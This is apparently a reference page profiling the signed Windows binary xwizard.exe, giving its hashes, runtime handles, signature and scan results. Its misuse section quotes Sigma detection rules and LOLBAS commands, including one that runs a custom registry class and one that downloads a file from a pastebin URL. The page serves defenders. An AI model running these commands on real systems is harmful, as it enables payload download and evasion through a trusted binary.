xwizard.exe

  • File Path: C:\Windows\system32\xwizard.exe
  • Description: Extensible Wizards Host Process

Hashes

Type Hash
MD5 30C784340F42DB44A84C7958C240E394
SHA1 A9611D90310FE54D0F78E7E067B00C9D53C870C3
SHA256 4359C82A6760D717EC367BC80B1A70E149BF7E197EA45C1188A4826570B96C50
SHA384 A339A0099D201304612ADBACC84D0E81132C0BB3CC73A7D6A7F8764CCD661AFA04390F98C922E310CAFFB3C0A9CD6CC1
SHA512 F5F7DA6505DFDE7060EC0FB186915F4390EB1D0A3048EFFC65DF41B9B6201E501BE1AD6CB3DB8F626451FD3FDFAF5EF9D615200B7D039F79E93EF74E4A359D8E
SSDEEP 1536:Q6/9faJbkDGuJjMVxMckeR1Ea/0z/v7SIiuIJcURDoq4OZZZLlCIib:Q6/9CJbUGuJjYM57CuIJ9RD68wb
IMP 42465F712C75BD79EB46ECE0D31A4B8D
PESHA1 8C6D1387B27148E3DD998ED4B79D7A87CDCED1E1
PE256 86F45225EDBB0758C7B7ADCDB80F6021DF4761538423387E08A024113240F9CD

Runtime Data

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\xwizard.exe.mui File
(R-D) C:\Windows\SystemResources\imageres.dll.mun File
(RW-) C:\Users\user File
(RW-) C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.488_none_ca04af081b815d21 File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2 Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\1\Windows\Theme1175649999 Section
\Windows\Theme601709542 Section

Loaded Modules:

Path
C:\Windows\System32\combase.dll
C:\Windows\System32\KERNEL32.DLL
C:\Windows\System32\KERNELBASE.dll
C:\Windows\System32\msvcp_win.dll
C:\Windows\System32\msvcrt.dll
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\OLEAUT32.dll
C:\Windows\System32\RPCRT4.dll
C:\Windows\System32\ucrtbase.dll
C:\Windows\system32\xwizard.exe

Signature

  • Status: Signature verified.
  • Serial: 330000026551AE1BBD005CBFBD000000000265
  • Thumbprint: E168609353F30FF2373157B4EB8CD519D07A2BFF
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: xwizard.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/75
  • VirusTotal Link: https://www.virustotal.com/gui/file/4359c82a6760d717ec367bc80b1a70e149bf7e197ea45c1188a4826570b96c50/detection

File Similarity (ssdeep match)

File Score
C:\Windows\system32\ComputerDefaults.exe 46
C:\WINDOWS\system32\ComputerDefaults.exe 40
C:\WINDOWS\system32\ComputerDefaults.exe 41
C:\Windows\system32\ComputerDefaults.exe 46
C:\windows\system32\ComputerDefaults.exe 47
C:\Windows\system32\ComputerDefaults.exe 46
C:\Windows\system32\xwizard.exe 44
C:\windows\system32\xwizard.exe 46
C:\WINDOWS\system32\xwizard.exe 41
C:\WINDOWS\system32\xwizard.exe 43
C:\Windows\system32\xwizard.exe 47
C:\windows\SysWOW64\ComputerDefaults.exe 49
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 44
C:\Windows\SysWOW64\ComputerDefaults.exe 46
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 33
C:\Windows\SysWOW64\ComputerDefaults.exe 40
C:\Windows\SysWOW64\ComputerDefaults.exe 44
C:\WINDOWS\SysWOW64\xwizard.exe 49
C:\Windows\SysWOW64\xwizard.exe 49
C:\Windows\SysWOW64\xwizard.exe 46
C:\windows\SysWOW64\xwizard.exe 49
C:\Windows\SysWOW64\xwizard.exe 47
C:\WINDOWS\SysWOW64\xwizard.exe 47

Possible Misuse

The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_class_exec_xwizard.yml title: Custom Class Execution via Xwizard DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml description: Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties. DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml Image\|endswith: '\xwizard.exe' DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml title: Xwizard DLL Sideloading DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml Image\|endswith: '\xwizard.exe' DRL 1.0
LOLBAS Xwizard.yml Name: Xwizard.exe  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM  
LOLBAS Xwizard.yml Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.  
LOLBAS Xwizard.yml - Path: C:\Windows\System32\xwizard.exe  
LOLBAS Xwizard.yml - Path: C:\Windows\SysWOW64\xwizard.exe  

MIT License. Copyright (c) 2020-2021 Strontic.